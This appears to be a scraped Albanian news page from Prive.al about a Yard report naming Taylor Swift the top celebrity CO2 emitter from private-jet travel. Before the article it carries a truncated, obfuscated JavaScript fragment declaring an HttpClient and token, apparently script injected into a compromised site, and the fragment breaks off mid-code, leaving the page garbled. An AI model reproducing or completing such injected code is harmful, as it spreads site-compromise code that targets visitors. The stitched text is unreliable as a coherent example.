;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Emërohet artistja që po shkakton ndotjen më të madhe në Tokë!

By

Taylor Swift ka qenë në lajme ditët e fundit, jo për emisionet e saj muzikore, por për ato të tjera më të dëmshme: ylli i popit është kurorëzuar si artistja që ndot më shumë.

Swift ka folur për dashurinë e saj për mjedisin, por mesa duket ajo nuk ka mundur t’i japë përparësi planetit mbi dashurinë e saj për fluturimet me avionin e saj privat.

Kompania Yard ka bërë një tabelë të quajtur “10 shkelësit më të mirë të CO2 mes personazheve të famshëm”, ku kanë përcaktuar se cilët janë artistët që kanë prodhuar më shumë CO2 për shkak të udhëtimeve të tyre me avion privat.

Raporti zbuloi se këngëtarja Taylor Swift është e famshmja që ka ndotur më shumë vitin e fundit. Këngëtarja ka bërë 170 udhëtime që nga janari, që barazohet me gati 16 ditë të plota në ajër.

Emetimet nga fluturimet e saj kanë arritur në 8,293.54 ton CO2. Yard vëren se kjo shifër është “1,184.8 herë më shumë se emetimet vjetore të një personi mesatar”.

Kompania gjithashtu theksoi se fluturimi më i shkurtër i Swift ishte vetëm 36 minuta, diçka që mund të ishte shmangur. /Prive.al

Artikuj të ngjashëm